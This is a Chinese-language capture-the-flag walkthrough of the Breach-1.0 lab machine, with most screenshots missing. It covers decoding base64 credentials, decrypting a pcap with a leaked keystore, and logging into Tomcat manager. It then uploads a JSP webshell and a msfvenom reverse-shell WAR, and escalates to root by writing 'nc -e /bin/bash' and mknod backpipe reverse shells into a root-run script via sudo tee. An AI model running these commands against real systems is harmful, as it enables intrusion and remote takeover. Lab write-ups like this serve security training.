kali滲透綜合靶機(十五)--Breach-1.0靶機

 kali滲透綜合靶機(十五)--Breach-1.0靶機

靶機下載地址:https://download.vulnhub.com/breach/Breach-1.0.zip

一、主機發現

1.netdiscover -i eth0 -r 192.168.110.0/24

　　

二、端口掃描

1. masscan --rate=10000 -p0-65535 192.168.110.140,發現端口幾乎全部開放了,不符合常識,可能目標對端口掃描做了一些防護措施

三、漏洞查找與利用

1.目錄掃描

　　

　　

2.1直接訪問80端口,進入web首頁http://192.168.110.140/

　　

2.2查看頁面源碼發現一串疑似base64加密的字符串

　　

2.3將其復制到Burpsuite Decoder進行base64解碼，解密后發現還是base64編碼，繼續base64解碼，得到pgibbons:damnitfeel$goodtobeagang$ta

　　

2.4.發現圖中的圖片等點擊,點擊跳轉

　　

3.1查看頁面源碼,發現如下提示

　　

3.2嘗試發現頁面是否有有用的信息,發現點擊下圖,跳轉到impresscms登錄界面

　　

　　

4.嘗試使用之前base64解密出來的疑似用戶名密碼的字符串,成功登錄

　　

5.發現cms大致版本信息,搜索引擎搜索是否有相關的漏洞

　　

6. exploit-db.com查找impress cms漏洞：發現ImpressCMS 1.3.9 SQL注入漏洞, /modules/profile/admin/field.php,訪問該頁面，提示沒有權限訪問,無法進行注入

　　

7. 發現收件箱Inbox顯示有3封郵件，依次打開看

　　

8. 第三個郵件發現有一個SSL證書被保存在192.168.110.140/.keystore

　　

9. 訪問http://192.168.110.140/.keystore下載包含SSL證書的密鑰庫keystore文件，keystore是存儲公私密鑰的一種文件格式

10. 點擊View Account菜單進入界面，再依次點擊頁面的Content，會彈出一行鏈接Content SSL implementation test capture，點擊鏈接

　　

　　

11.點擊完上圖的鏈接,跳轉到如下界面，可以看到一個名為：_SSL_test_phase1.pcap的Wireshark流量包文件，下載

　　

12.用wireshark打開下載的pacp包,發現是包的內容經過SSL加密

13.查看keystore這個密匙庫里面的所有證書

keytool -list -keystore keystore

　　

14. 從密鑰庫導出.p12證書

keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat

　　

15. 將.p12證書導入Wireshark

在Wireshark中打開_SSL_test_phase1.pcap流量包文件，選擇菜單：編輯–首選項–Protocols–SSL，點擊右邊的Edit

　　

　　

16. 導入證書后，https流量已經被解密，查看每個http流量包

16.1發現如下

　　

16.2訪問https://192.168.110.140:8443/_M@nag3Me/html發現是tomcat管理頁面,需要登錄

　　

16.3發現tomcat采用采用http basic認證,認證數據包如下,wireshark自動解密tomcat:Tt\5D8F(#!*u=G)4m7zB

　　

17.使用上面得到的tomcat密碼登錄成功

　　

18.把一句話jsp一句話木馬上傳過去,打包成rar,在修改后綴為war

　　

19.可以看到上傳成功

　　

20.菜刀鏈接失敗, 發現的問題：上傳的菜刀馬，一會兒就會消失，文件被刪除，需要重新上傳war包才能夠繼續使用菜刀，主機可能有殺軟或者殺web shell工具。解決方法：bash反彈一個shell出來

21.msf生成一個war格式的反彈shell

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.136 lport=4444 -f war -o test.war

　　

22.msf開啟監聽

　　

23.tomcat后台上傳test.war文件

　　

24.訪問https://192.168.110.140:8443/test/，等幾秒，kali獲得反彈shell

　　

　　

25. python -c 'import pty;pty.spawn("/bin/bash")'

　　

26.拿到shell之后,接下來便是提權了，收集主機信息,發現沒有內核提權，在/etc/passwd發現milton 和 blumbergh用戶

　　

27.在網站發現如下內容

　　

28.查看發現如下內容

　　

29.登錄mysql數據庫,發現milton的密碼

　　

30.解密

　　

31.登錄milton，查看是否屬於sudo組，沒有什么發現　　

　　

32. 在http://192.168.110.140/images/目錄下發現六張圖片　　

　　

33.將圖片復制到kali linux，使用strings打印各圖片其中的可打印字符，追加輸出到images.txt，在vim下查看，密碼在bill.png圖片中，密碼為coffeestains

34.登錄blumbergh,查看是否屬於sudo組

　　

35.查看權限,發現/usr/share/cleanup/tidyup.sh只有root可寫

　　

36.tidyup.sh文件只有root可寫，而能夠以root權限運行tee命令，那么用tee命令寫tidyup.sh：先將反彈shell命令寫入shell.txt文件,nc反彈命令

echo "nc -e /bin/bash 192.168.110.136 5555" > shell.txt

再使用tee命令將shell.txt內容輸出到tidyup.sh

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

也可以用mknod backpipe p && nc 192.168.110.136 2222 0<backpipe | /bin/bash 1>backpipe反彈shell

查看tidyup.sh文件寫入成功：cat /usr/share/cleanup/tidyup.sh

　　

37.kali監聽,提權成功